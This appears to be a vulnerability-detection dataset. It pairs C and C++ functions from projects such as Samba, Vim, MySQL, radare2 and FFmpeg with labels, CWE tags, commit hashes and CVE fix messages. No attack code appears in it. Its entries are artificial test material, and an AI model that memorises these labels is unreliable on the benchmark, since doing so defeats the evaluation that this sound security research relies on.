static int check_spn_direct_collision(struct ldb_context *ldb, TALLOC_CTX *mem_ctx, const char *spn, struct ldb_dn *target_dn) { int ret; TALLOC_CTX *tmp_ctx = NULL; struct ldb_dn *colliding_dn = NULL; const char *target_dnstr = NULL; const char *colliding_dnstr = NULL; tmp_ctx = talloc_new(mem_ctx); if (tmp_ctx == NULL) { return ldb_oom(ldb); } ret = get_spn_dn(ldb, tmp_ctx, spn, &colliding_dn); if (ret == LDB_ERR_NO_SUCH_OBJECT) { DBG_DEBUG("SPN '%s' not found (good)\n", spn); talloc_free(tmp_ctx); return LDB_SUCCESS; } if (ret != LDB_SUCCESS) { DBG_ERR("SPN '%s' search error %d\n", spn, ret); talloc_free(tmp_ctx); if (ret == LDB_ERR_COMPARE_TRUE) { /* * COMPARE_TRUE has special meaning here and we don't * want to return it by mistake. */ ret = LDB_ERR_OPERATIONS_ERROR; } return ret; } /* * We have found this exact SPN. This is mostly harmless (depend on * ADD vs REPLACE) when the spn is being put on the object that * already has, so we let it through to succeed or fail as some other * module sees fit. */ target_dnstr = ldb_dn_get_linearized(target_dn); ret = ldb_dn_compare(colliding_dn, target_dn); if (ret != 0) { colliding_dnstr = ldb_dn_get_linearized(colliding_dn); DBG_ERR("SPN '%s' is on '%s' so it can't be " "added to '%s'\n", spn, colliding_dnstr, target_dnstr); ldb_asprintf_errstring(ldb, "samldb: spn[%s] would cause a conflict", spn); talloc_free(tmp_ctx); return LDB_ERR_CONSTRAINT_VIOLATION; } DBG_INFO("SPN '%s' is already on '%s'\n", spn, target_dnstr); talloc_free(tmp_ctx); return LDB_ERR_COMPARE_TRUE; }
0
[ "CWE-200" ]
samba
0a3aa5f908e351201dc9c4d4807b09ed9eedff77
269,844,203,976,710,800,000,000,000,000,000,000,000
61
CVE-2022-32746 ldb: Make use of functions for appending to an ldb_message This aims to minimise usage of the error-prone pattern of searching for a just-added message element in order to make modifications to it (and potentially finding the wrong element). BUG: https://bugzilla.samba.org/show_bug.cgi?id=15009 Signed-off-by: Joseph Sutton <[email protected]>
int ldb_kv_search_base(struct ldb_module *module, TALLOC_CTX *mem_ctx, struct ldb_dn *dn, struct ldb_dn **ret_dn) { int exists; int ret; struct ldb_message *msg = NULL; if (ldb_dn_is_null(dn)) { return LDB_ERR_NO_SUCH_OBJECT; } /* * We can't use tdb_exists() directly on a key when the TDB * key is the GUID one, not the DN based one. So we just do a * normal search and avoid most of the allocation with the * LDB_UNPACK_DATA_FLAG_NO_ATTRS flag */ msg = ldb_msg_new(module); if (msg == NULL) { return LDB_ERR_OPERATIONS_ERROR; } ret = ldb_kv_search_dn1(module, dn, msg, LDB_UNPACK_DATA_FLAG_NO_ATTRS); if (ret == LDB_SUCCESS) { const char *dn_linearized = ldb_dn_get_linearized(dn); const char *msg_dn_linearized = ldb_dn_get_linearized(msg->dn); if (strcmp(dn_linearized, msg_dn_linearized) == 0) { /* * Re-use the full incoming DN for * subtree checks */ *ret_dn = dn; } else { /* * Use the string DN from the unpack, so that * we have a case-exact match of the base */ *ret_dn = talloc_steal(mem_ctx, msg->dn); } exists = true; } else if (ret == LDB_ERR_NO_SUCH_OBJECT) { exists = false; } else { talloc_free(msg); return ret; } talloc_free(msg); if (exists) { return LDB_SUCCESS; } return LDB_ERR_NO_SUCH_OBJECT; }
0
[ "CWE-703" ]
samba
08c9016cb9f25105c39488770113a1b00f8a4223
53,675,298,263,018,900,000,000,000,000,000,000,000
57
CVE-2021-3670 ldb: Confirm the request has not yet timed out in ldb filter processing The LDB filter processing is where the time is spent in the LDB stack but the timeout event will not get run while this is ongoing, so we must confirm we have not yet timed out manually. RN: Ensure that the LDB request has not timed out during filter processing as the LDAP server MaxQueryDuration is otherwise not honoured. BUG: https://bugzilla.samba.org/show_bug.cgi?id=14694 Signed-off-by: Andrew Bartlett <[email protected]> Reviewed-by: Douglas Bagnall <[email protected]> (cherry picked from commit 1d5b155619bc532c46932965b215bd73a920e56f)
std::string postfix_uniq(const std::string &filename, const char * ext) { std::string::size_type where =filename.find_last_of("./\\"); if (where == std::string::npos || filename[where] != '.') { return uniq_filename(filename + ext); } return uniq_filename(filename.substr(0, where) + ext); }
0
[ "CWE-399", "CWE-190" ]
lepton
6a5ceefac1162783fffd9506a3de39c85c725761
283,040,867,888,471,120,000,000,000,000,000,000,000
7
fix #111
rb_str_swapcase_bang(VALUE str) { rb_encoding *enc; char *s, *send; int modify = 0; int n; str_modify_keep_cr(str); enc = STR_ENC_GET(str); rb_str_check_dummy_enc(enc); s = RSTRING_PTR(str); send = RSTRING_END(str); while (s < send) { unsigned int c = rb_enc_codepoint_len(s, send, &n, enc); if (rb_enc_isupper(c, enc)) { /* assuming toupper returns codepoint with same size */ rb_enc_mbcput(rb_enc_tolower(c, enc), s, enc); modify = 1; } else if (rb_enc_islower(c, enc)) { /* assuming tolower returns codepoint with same size */ rb_enc_mbcput(rb_enc_toupper(c, enc), s, enc); modify = 1; } s += n; } if (modify) return str; return Qnil; }
0
[ "CWE-119" ]
ruby
1c2ef610358af33f9ded3086aa2d70aac03dcac5
164,625,976,666,111,000,000,000,000,000,000,000,000
30
* string.c (rb_str_justify): CVE-2009-4124. Fixes a bug reported by Emmanouel Kellinis <Emmanouel.Kellinis AT kpmg.co.uk>, KPMG London; Patch by nobu. git-svn-id: svn+ssh://ci.ruby-lang.org/ruby/trunk@26038 b2dd03c8-39d4-4d8f-98ff-823fe69b080e
change_warning(int col) { static char *w_readonly = N_("W10: Warning: Changing a readonly file"); if (curbuf->b_did_warn == FALSE && curbufIsChanged() == 0 && !autocmd_busy && curbuf->b_p_ro) { ++curbuf_lock; apply_autocmds(EVENT_FILECHANGEDRO, NULL, NULL, FALSE, curbuf); --curbuf_lock; if (!curbuf->b_p_ro) return; // Do what msg() does, but with a column offset if the warning should // be after the mode message. msg_start(); if (msg_row == Rows - 1) msg_col = col; msg_source(HL_ATTR(HLF_W)); msg_puts_attr(_(w_readonly), HL_ATTR(HLF_W) | MSG_HIST); #ifdef FEAT_EVAL set_vim_var_string(VV_WARNINGMSG, (char_u *)_(w_readonly), -1); #endif msg_clr_eos(); (void)msg_end(); if (msg_silent == 0 && !silent_mode #ifdef FEAT_EVAL && time_for_testing != 1 #endif ) { out_flush(); ui_delay(1002L, TRUE); // give the user time to think about it } curbuf->b_did_warn = TRUE; redraw_cmdline = FALSE; // don't redraw and erase the message if (msg_row < Rows - 1) showmode(); } }
0
[ "CWE-120" ]
vim
7ce5b2b590256ce53d6af28c1d203fb3bc1d2d97
133,045,716,671,458,350,000,000,000,000,000,000,000
42
patch 8.2.4969: changing text in Visual mode may cause invalid memory access Problem: Changing text in Visual mode may cause invalid memory access. Solution: Check the Visual position after making a change.
static bool parse_com_change_user_packet(MPVIO_EXT *mpvio, uint packet_length) { NET *net= mpvio->net; char *user= (char*) net->read_pos; char *end= user + packet_length; /* Safe because there is always a trailing \0 at the end of the packet */ char *passwd= strend(user) + 1; uint user_len= passwd - user - 1; char *db= passwd; char db_buff[NAME_LEN + 1]; // buffer to store db in utf8 char user_buff[USERNAME_LENGTH + 1]; // buffer to store user in utf8 uint dummy_errors; DBUG_ENTER ("parse_com_change_user_packet"); if (passwd >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN (1); } /* Old clients send null-terminated string as password; new clients send the size (1 byte) + string (not null-terminated). Hence in case of empty password both send '\0'. This strlen() can't be easily deleted without changing protocol. Cast *passwd to an unsigned char, so that it doesn't extend the sign for *passwd > 127 and become 2**32-127+ after casting to uint. */ uint passwd_len= (mpvio->client_capabilities & CLIENT_SECURE_CONNECTION ? (uchar) (*passwd++) : strlen(passwd)); db+= passwd_len + 1; /* Database name is always NUL-terminated, so in case of empty database the packet must contain at least the trailing '\0'. */ if (db >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN (1); } uint db_len= strlen(db); char *ptr= db + db_len + 1; if (ptr + 1 < end) { if (mpvio->charset_adapter->init_client_charset(uint2korr(ptr))) DBUG_RETURN(1); } /* Convert database and user names to utf8 */ db_len= copy_and_convert(db_buff, sizeof(db_buff) - 1, system_charset_info, db, db_len, mpvio->charset_adapter->charset(), &dummy_errors); db_buff[db_len]= 0; user_len= copy_and_convert(user_buff, sizeof(user_buff) - 1, system_charset_info, user, user_len, mpvio->charset_adapter->charset(), &dummy_errors); user_buff[user_len]= 0; /* we should not free mpvio->user here: it's saved by dispatch_command() */ if (!(mpvio->auth_info.user_name= my_strndup(user_buff, user_len, MYF(MY_WME)))) return 1; mpvio->auth_info.user_name_length= user_len; if (make_lex_string_root(mpvio->mem_root, &mpvio->db, db_buff, db_len, 0) == 0) DBUG_RETURN(1); /* The error is set by make_lex_string(). */ if (!initialized) { // if mysqld's been started with --skip-grant-tables option strmake(mpvio->auth_info.authenticated_as, mpvio->auth_info.user_name, USERNAME_LENGTH); mpvio->status= MPVIO_EXT::SUCCESS; DBUG_RETURN(0); } #ifndef NO_EMBEDDED_ACCESS_CHECKS if (find_mpvio_user(mpvio)) { DBUG_RETURN(1); } char *client_plugin; if (mpvio->client_capabilities & CLIENT_PLUGIN_AUTH) { client_plugin= ptr + 2; if (client_plugin >= end) { my_message(ER_UNKNOWN_COM_ERROR, ER(ER_UNKNOWN_COM_ERROR), MYF(0)); DBUG_RETURN(1); } } else { if (mpvio->client_capabilities & CLIENT_SECURE_CONNECTION) client_plugin= native_password_plugin_name.str; else { client_plugin= old_password_plugin_name.str; /* For a passwordless accounts we use native_password_plugin. But when an old 4.0 client connects to it, we change it to old_password_plugin, otherwise MySQL will think that server and client plugins don't match. */ if (mpvio->acl_user->salt_len == 0) mpvio->acl_user_plugin= old_password_plugin_name; } } size_t bytes_remaining_in_packet= end - ptr; if ((mpvio->client_capabilities & CLIENT_CONNECT_ATTRS) && read_client_connect_attrs(&ptr, &bytes_remaining_in_packet, mpvio->charset_adapter->charset())) return packet_error; DBUG_PRINT("info", ("client_plugin=%s, restart", client_plugin)); /* Remember the data part of the packet, to present it to plugin in read_packet() */ mpvio->cached_client_reply.pkt= passwd; mpvio->cached_client_reply.pkt_len= passwd_len; mpvio->cached_client_reply.plugin= client_plugin; mpvio->status= MPVIO_EXT::RESTART; #endif DBUG_RETURN (0); }
0
[]
mysql-server
25d1b7e03b9b375a243fabdf0556c063c7282361
16,221,284,244,077,850,000,000,000,000,000,000,000
140
Bug #22722946: integer overflow may lead to wrong results in get_56_lenc_string
static int bin_symbols(RCore *r, int mode, ut64 laddr, int va, ut64 at, const char *name, bool exponly, const char *args) { RBinInfo *info = r_bin_get_info (r->bin); RList *entries = r_bin_get_entries (r->bin); RBinSymbol *symbol; RBinAddr *entry; RListIter *iter; bool firstexp = true; bool printHere = false; int i = 0, lastfs = 's'; bool bin_demangle = r_config_get_i (r->config, "bin.demangle"); if (!info) { return 0; } if (args && *args == '.') { printHere = true; } bool is_arm = info && info->arch && !strncmp (info->arch, "arm", 3); const char *lang = bin_demangle ? r_config_get (r->config, "bin.lang") : NULL; RList *symbols = r_bin_get_symbols (r->bin); r_spaces_push (&r->anal->meta_spaces, "bin"); if (IS_MODE_JSON (mode) && !printHere) { r_cons_printf ("["); } else if (IS_MODE_SET (mode)) { r_flag_space_set (r->flags, R_FLAGS_FS_SYMBOLS); } else if (!at && exponly) { if (IS_MODE_RAD (mode)) { r_cons_printf ("fs exports\n"); } else if (IS_MODE_NORMAL (mode)) { r_cons_printf (printHere ? "" : "[Exports]\n"); } } else if (!at && !exponly) { if (IS_MODE_RAD (mode)) { r_cons_printf ("fs symbols\n"); } else if (IS_MODE_NORMAL (mode)) { r_cons_printf (printHere ? "" : "[Symbols]\n"); } } if (IS_MODE_NORMAL (mode)) { r_cons_printf ("Num Paddr Vaddr Bind Type Size Name\n"); } size_t count = 0; r_list_foreach (symbols, iter, symbol) { if (!symbol->name) { continue; } char *r_symbol_name = r_str_escape_utf8 (symbol->name, false, true); ut64 addr = compute_addr (r->bin, symbol->paddr, symbol->vaddr, va); int len = symbol->size ? symbol->size : 32; SymName sn = {0}; if (exponly && !isAnExport (symbol)) { free (r_symbol_name); continue; } if (name && strcmp (r_symbol_name, name)) { free (r_symbol_name); continue; } if (at && (!symbol->size || !is_in_range (at, addr, symbol->size))) { free (r_symbol_name); continue; } if ((printHere && !is_in_range (r->offset, symbol->paddr, len)) && (printHere && !is_in_range (r->offset, addr, len))) { free (r_symbol_name); continue; } count ++; snInit (r, &sn, symbol, lang); if (IS_MODE_SET (mode) && (is_section_symbol (symbol) || is_file_symbol (symbol))) { /* * Skip section symbols because they will have their own flag. * Skip also file symbols because not useful for now. */ } else if (IS_MODE_SET (mode) && is_special_symbol (symbol)) { if (is_arm) { handle_arm_special_symbol (r, symbol, va); } } else if (IS_MODE_SET (mode)) { // TODO: provide separate API in RBinPlugin to let plugins handle anal hints/metadata if (is_arm) { handle_arm_symbol (r, symbol, info, va); } select_flag_space (r, symbol); /* If that's a Classed symbol (method or so) */ if (sn.classname) { RFlagItem *fi = r_flag_get (r->flags, sn.methflag); if (r->bin->prefix) { char *prname = r_str_newf ("%s.%s", r->bin->prefix, sn.methflag); r_name_filter (sn.methflag, -1); free (sn.methflag); sn.methflag = prname; } if (fi) { r_flag_item_set_realname (fi, sn.methname); if ((fi->offset - r->flags->base) == addr) { // char *comment = fi->comment ? strdup (fi->comment) : NULL; r_flag_unset (r->flags, fi); } } else { fi = r_flag_set (r->flags, sn.methflag, addr, symbol->size); char *comment = fi->comment ? strdup (fi->comment) : NULL; if (comment) { r_flag_item_set_comment (fi, comment); R_FREE (comment); } } } else { const char *n = sn.demname ? sn.demname : sn.name; const char *fn = sn.demflag ? sn.demflag : sn.nameflag; char *fnp = (r->bin->prefix) ? r_str_newf ("%s.%s", r->bin->prefix, fn): strdup (fn); RFlagItem *fi = r_flag_set (r->flags, fnp, addr, symbol->size); if (fi) { r_flag_item_set_realname (fi, n); fi->demangled = (bool)(size_t)sn.demname; } else { if (fn) { eprintf ("[Warning] Can't find flag (%s)\n", fn); } } free (fnp); } if (sn.demname) { r_meta_add (r->anal, R_META_TYPE_COMMENT, addr, symbol->size, sn.demname); } r_flag_space_pop (r->flags); } else if (IS_MODE_JSON (mode)) { char *str = r_str_escape_utf8_for_json (r_symbol_name, -1); // str = r_str_replace (str, "\"", "\\\"", 1); r_cons_printf ("%s{\"name\":\"%s\"," "\"demname\":\"%s\"," "\"flagname\":\"%s\"," "\"ordinal\":%d," "\"bind\":\"%s\"," "\"size\":%d," "\"type\":\"%s\"," "\"vaddr\":%"PFMT64d"," "\"paddr\":%"PFMT64d"}", ((exponly && firstexp) || printHere) ? "" : (iter->p ? "," : ""), str, sn.demname? sn.demname: "", sn.nameflag, symbol->ordinal, symbol->bind, (int)symbol->size, symbol->type, (ut64)addr, (ut64)symbol->paddr); free (str); } else if (IS_MODE_SIMPLE (mode)) { const char *name = sn.demname? sn.demname: r_symbol_name; r_cons_printf ("0x%08"PFMT64x" %d %s\n", addr, (int)symbol->size, name); } else if (IS_MODE_SIMPLEST (mode)) { const char *name = sn.demname? sn.demname: r_symbol_name; r_cons_printf ("%s\n", name); } else if (IS_MODE_RAD (mode)) { /* Skip special symbols because we do not flag them and * they shouldn't be printed in the rad format either */ if (is_special_symbol (symbol)) { goto next; } RBinFile *binfile; RBinPlugin *plugin; const char *name = sn.demname? sn.demname: r_symbol_name; if (!name) { goto next; } if (!strncmp (name, "imp.", 4)) { if (lastfs != 'i') { r_cons_printf ("fs imports\n"); } lastfs = 'i'; } else { if (lastfs != 's') { const char *fs = exponly? "exports": "symbols"; r_cons_printf ("fs %s\n", fs); } lastfs = 's'; } if (r->bin->prefix || *name) { // we don't want unnamed symbol flags char *flagname = construct_symbol_flagname ("sym", name, MAXFLAG_LEN_DEFAULT); if (!flagname) { goto next; } r_cons_printf ("\"f %s%s%s %u 0x%08" PFMT64x "\"\n", r->bin->prefix ? r->bin->prefix : "", r->bin->prefix ? "." : "", flagname, symbol->size, addr); free (flagname); } binfile = r_bin_cur (r->bin); plugin = r_bin_file_cur_plugin (binfile); if (plugin && plugin->name) { if (r_str_startswith (plugin->name, "pe")) { char *module = strdup (r_symbol_name); char *p = strstr (module, ".dll_"); if (p && strstr (module, "imp.")) { char *symname = __filterShell (p + 5); char *m = __filterShell (module); *p = 0; if (r->bin->prefix) { r_cons_printf ("\"k bin/pe/%s/%d=%s.%s\"\n", module, symbol->ordinal, r->bin->prefix, symname); } else { r_cons_printf ("\"k bin/pe/%s/%d=%s\"\n", module, symbol->ordinal, symname); } free (symname); free (m); } free (module); } } } else { const char *bind = symbol->bind? symbol->bind: "NONE"; const char *type = symbol->type? symbol->type: "NONE"; const char *name = r_str_get (sn.demname? sn.demname: r_symbol_name); // const char *fwd = r_str_get (symbol->forwarder); r_cons_printf ("%03u", symbol->ordinal); if (symbol->paddr == UT64_MAX) { r_cons_printf (" ----------"); } else { r_cons_printf (" 0x%08"PFMT64x, symbol->paddr); } r_cons_printf (" 0x%08"PFMT64x" %6s %6s %4d%s%s\n", addr, bind, type, symbol->size, *name? " ": "", name); } next: snFini (&sn); i++; free (r_symbol_name); if (exponly && firstexp) { firstexp = false; } if (printHere) { break; } } if (count == 0 && IS_MODE_JSON (mode)) { r_cons_printf ("{}"); } //handle thumb and arm for entry point since they are not present in symbols if (is_arm) { r_list_foreach (entries, iter, entry) { if (IS_MODE_SET (mode)) { handle_arm_entry (r, entry, info, va); } } } if (IS_MODE_JSON (mode) && !printHere) { r_cons_printf ("]"); } r_spaces_pop (&r->anal->meta_spaces); return true; }
0
[ "CWE-78" ]
radare2
5411543a310a470b1257fb93273cdd6e8dfcb3af
36,683,712,879,229,577,000,000,000,000,000,000,000
267
More fixes for the CVE-2019-14745
Status readUTF8String( StringData* out ) { int sz; if ( !readNumber<int>( &sz ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); if ( sz <= 0 ) { // must have NULL at the very least return Status( ErrorCodes::InvalidBSON, "invalid bson"); } if ( out ) { *out = StringData( _buffer + _position, sz ); } if ( !skip( sz - 1 ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); char c; if ( !readNumber<char>( &c ) ) return Status( ErrorCodes::InvalidBSON, "invalid bson" ); if ( c != 0 ) return Status( ErrorCodes::InvalidBSON, "not null terminate string" ); return Status::OK(); }
0
[ "CWE-20" ]
mongo
3a7e85ea1f672f702660e5472566234b1d19038e
127,496,780,341,174,380,000,000,000,000,000,000,000
26
SERVER-17264: improve bson validation for utf-8 strings (cherry picked from commit 394a8569ff14a215c0691aa34440227b2e62a4de) Conflicts: src/mongo/bson/bson_validate_test.cpp
static int mxf_read_package(void *arg, AVIOContext *pb, int tag, int size, UID uid, int64_t klv_offset) { MXFPackage *package = arg; switch(tag) { case 0x4403: return mxf_read_strong_ref_array(pb, &package->tracks_refs, &package->tracks_count); case 0x4401: /* UMID */ avio_read(pb, package->package_ul, 16); avio_read(pb, package->package_uid, 16); break; case 0x4701: avio_read(pb, package->descriptor_ref, 16); break; case 0x4402: return mxf_read_utf16be_string(pb, size, &package->name); case 0x4406: return mxf_read_strong_ref_array(pb, &package->comment_refs, &package->comment_count); } return 0; }
0
[ "CWE-703", "CWE-834" ]
FFmpeg
900f39692ca0337a98a7cf047e4e2611071810c2
9,728,594,139,784,304,000,000,000,000,000,000,000
23
avformat/mxfdec: Fix DoS issues in mxf_read_index_entry_array() Fixes: 20170829A.mxf Co-Author: 张洪亮(望初)" <[email protected]> Found-by: Xiaohei and Wangchu from Alibaba Security Team Signed-off-by: Michael Niedermayer <[email protected]>
icon_to_string (GIcon *icon) { const char * const *names; GFile *file; if (icon == NULL) { return NULL; } else if (G_IS_THEMED_ICON (icon)) { names = g_themed_icon_get_names (G_THEMED_ICON (icon)); return g_strjoinv (":", (char **)names); } else if (G_IS_FILE_ICON (icon)) { file = g_file_icon_get_file (G_FILE_ICON (icon)); return g_file_get_path (file); } return NULL; }
0
[]
nautilus
1e1c916f5537eb5e4144950f291f4a3962fc2395
42,657,662,843,166,360,000,000,000,000,000,000,000
16
Add "interactive" argument to nautilus_file_mark_desktop_file_trusted. 2009-02-24 Alexander Larsson <[email protected]> * libnautilus-private/nautilus-file-operations.c: * libnautilus-private/nautilus-file-operations.h: * libnautilus-private/nautilus-mime-actions.c: Add "interactive" argument to nautilus_file_mark_desktop_file_trusted. * src/nautilus-application.c: Mark all desktopfiles on the desktop trusted on first run. svn path=/trunk/; revision=15009
static inline bool check_inplace_update_policy(struct inode *inode, struct f2fs_io_info *fio) { struct f2fs_sb_info *sbi = F2FS_I_SB(inode); unsigned int policy = SM_I(sbi)->ipu_policy; if (policy & (0x1 << F2FS_IPU_FORCE)) return true; if (policy & (0x1 << F2FS_IPU_SSR) && f2fs_need_SSR(sbi)) return true; if (policy & (0x1 << F2FS_IPU_UTIL) && utilization(sbi) > SM_I(sbi)->min_ipu_util) return true; if (policy & (0x1 << F2FS_IPU_SSR_UTIL) && f2fs_need_SSR(sbi) && utilization(sbi) > SM_I(sbi)->min_ipu_util) return true; /* * IPU for rewrite async pages */ if (policy & (0x1 << F2FS_IPU_ASYNC) && fio && fio->op == REQ_OP_WRITE && !(fio->op_flags & REQ_SYNC) && !IS_ENCRYPTED(inode)) return true; /* this is only set during fdatasync */ if (policy & (0x1 << F2FS_IPU_FSYNC) && is_inode_flag_set(inode, FI_NEED_IPU)) return true; if (unlikely(fio && is_sbi_flag_set(sbi, SBI_CP_DISABLED) && !f2fs_is_checkpointed_data(sbi, fio->old_blkaddr))) return true; return false; }
0
[ "CWE-476" ]
linux
4969c06a0d83c9c3dc50b8efcdc8eeedfce896f6
74,844,705,757,955,390,000,000,000,000,000,000,000
37
f2fs: support swap file w/ DIO Signed-off-by: Jaegeuk Kim <[email protected]>
set_error_string( const char *message ) { if ( _globus_error_message ) { free( const_cast<char *>(_globus_error_message) ); } _globus_error_message = strdup( message ); }
0
[ "CWE-20" ]
htcondor
2f3c393feb819cf6c6d06fb0a2e9c4e171f3c26d
64,957,187,043,865,230,000,000,000,000,000,000,000
7
(#6455) Fix issue validating VOMS proxies
void jpc_ns_invlift_row(jpc_fix_t *a, int numcols, int parity) { register jpc_fix_t *lptr; register jpc_fix_t *hptr; register int n; int llen; llen = (numcols + 1 - parity) >> 1; if (numcols > 1) { /* Apply the scaling step. */ #if defined(WT_DOSCALE) lptr = &a[0]; n = llen; while (n-- > 0) { lptr[0] = jpc_fix_mul(lptr[0], jpc_dbltofix(1.0 / LGAIN)); ++lptr; } hptr = &a[llen]; n = numcols - llen; while (n-- > 0) { hptr[0] = jpc_fix_mul(hptr[0], jpc_dbltofix(1.0 / HGAIN)); ++hptr; } #endif /* Apply the first lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (!parity) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * DELTA), hptr[0])); ++lptr; } n = llen - (!parity) - (parity != (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(DELTA), jpc_fix_add(hptr[0], hptr[1]))); ++lptr; ++hptr; } if (parity != (numcols & 1)) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * DELTA), hptr[0])); } /* Apply the second lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (parity) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * GAMMA), lptr[0])); ++hptr; } n = numcols - llen - parity - (parity == (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(GAMMA), jpc_fix_add(lptr[0], lptr[1]))); ++hptr; ++lptr; } if (parity == (numcols & 1)) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * GAMMA), lptr[0])); } /* Apply the third lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (!parity) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * BETA), hptr[0])); ++lptr; } n = llen - (!parity) - (parity != (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(BETA), jpc_fix_add(hptr[0], hptr[1]))); ++lptr; ++hptr; } if (parity != (numcols & 1)) { jpc_fix_minuseq(lptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * BETA), hptr[0])); } /* Apply the fourth lifting step. */ lptr = &a[0]; hptr = &a[llen]; if (parity) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * ALPHA), lptr[0])); ++hptr; } n = numcols - llen - parity - (parity == (numcols & 1)); while (n-- > 0) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(ALPHA), jpc_fix_add(lptr[0], lptr[1]))); ++hptr; ++lptr; } if (parity == (numcols & 1)) { jpc_fix_minuseq(hptr[0], jpc_fix_mul(jpc_dbltofix(2.0 * ALPHA), lptr[0])); } } else { #if defined(WT_LENONE) if (parity) { lptr = &a[0]; lptr[0] >>= 1; } #endif } }
0
[ "CWE-189" ]
jasper
3c55b399c36ef46befcb21e4ebc4799367f89684
108,849,148,232,027,950,000,000,000,000,000,000,000
120
At many places in the code, jas_malloc or jas_recalloc was being invoked with the size argument being computed in a manner that would not allow integer overflow to be detected. Now, these places in the code have been modified to use special-purpose memory allocation functions (e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow. This should fix many security problems.
CImgDisplay::_fitscreen(dx,dy,dz,128,-85,true) static unsigned int _fitscreen(const unsigned int dx, const unsigned int dy, const unsigned int dz, const int dmin, const int dmax, const bool return_y) { const int u = CImgDisplay::screen_width(), v = CImgDisplay::screen_height(); const float mw = dmin<0?cimg::round(u*-dmin/100.f):(float)dmin, mh = dmin<0?cimg::round(v*-dmin/100.f):(float)dmin, Mw = dmax<0?cimg::round(u*-dmax/100.f):(float)dmax, Mh = dmax<0?cimg::round(v*-dmax/100.f):(float)dmax; float w = (float)std::max(1U,dx), h = (float)std::max(1U,dy); if (dz>1) { w+=dz; h+=dz; } if (w<mw) { h = h*mw/w; w = mw; } if (h<mh) { w = w*mh/h; h = mh; } if (w>Mw) { h = h*Mw/w; w = Mw; } if (h>Mh) { w = w*Mh/h; h = Mh; } if (w<mw) w = mw; if (h<mh) h = mh; return std::max(1U,(unsigned int)cimg::round(return_y?h:w));
0
[ "CWE-119", "CWE-787" ]
CImg
ac8003393569aba51048c9d67e1491559877b1d1
126,744,168,633,946,730,000,000,000,000,000,000,000
22
.
OsVendorInit(void) { static Bool beenHere = FALSE; signal(SIGCHLD, SIG_DFL); /* Need to wait for child processes */ if (!beenHere) { umask(022); xf86LogInit(); } /* Set stderr to non-blocking. */ #ifndef O_NONBLOCK #if defined(FNDELAY) #define O_NONBLOCK FNDELAY #elif defined(O_NDELAY) #define O_NONBLOCK O_NDELAY #endif #ifdef O_NONBLOCK if (!beenHere) { if (xf86PrivsElevated()) { int status; status = fcntl(fileno(stderr), F_GETFL, 0); if (status != -1) { fcntl(fileno(stderr), F_SETFL, status | O_NONBLOCK); } } } #endif #endif beenHere = TRUE; }
0
[]
xserver
032b1d79b7d04d47814a5b3a9fdd162249fea74c
135,089,262,103,994,470,000,000,000,000,000,000,000
35
xfree86: use the xf86CheckPrivs() helper for modulepath/logfile v2: Rebase against updated xf86CheckPrivs() helper. Reviewed-by: Adam Jackson <[email protected]> Signed-off-by: Emil Velikov <[email protected]>
repodata_set_str(Repodata *data, Id solvid, Id keyname, const char *str) { Repokey key; int l; l = strlen(str) + 1; key.name = keyname; key.type = REPOKEY_TYPE_STR; key.size = 0; key.storage = KEY_STORAGE_INCORE; data->attrdata = solv_extend(data->attrdata, data->attrdatalen, l, 1, REPODATA_ATTRDATA_BLOCK); memcpy(data->attrdata + data->attrdatalen, str, l); repodata_set(data, solvid, &key, data->attrdatalen); data->attrdatalen += l; }
0
[ "CWE-125" ]
libsolv
fdb9c9c03508990e4583046b590c30d958f272da
253,803,141,486,854,700,000,000,000,000,000,000,000
15
repodata_schema2id: fix heap-buffer-overflow in memcmp When the length of last schema in data->schemadata is less than length of input schema, we got a read overflow in asan test. Signed-off-by: Zhipeng Xie <[email protected]>
static CImg<floatT> box3d(CImgList<tf>& primitives, const float size_x=200, const float size_y=100, const float size_z=100) { primitives.assign(6,1,4,1,1, 0,3,2,1, 4,5,6,7, 0,1,5,4, 3,7,6,2, 0,4,7,3, 1,2,6,5); return CImg<floatT>(8,3,1,1, 0.,size_x,size_x, 0., 0.,size_x,size_x, 0., 0., 0.,size_y,size_y, 0., 0.,size_y,size_y, 0., 0., 0., 0.,size_z,size_z,size_z,size_z); }
0
[ "CWE-770" ]
cimg
619cb58dd90b4e03ac68286c70ed98acbefd1c90
308,365,003,376,796,940,000,000,000,000,000,000,000
8
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file does not exceed file size.
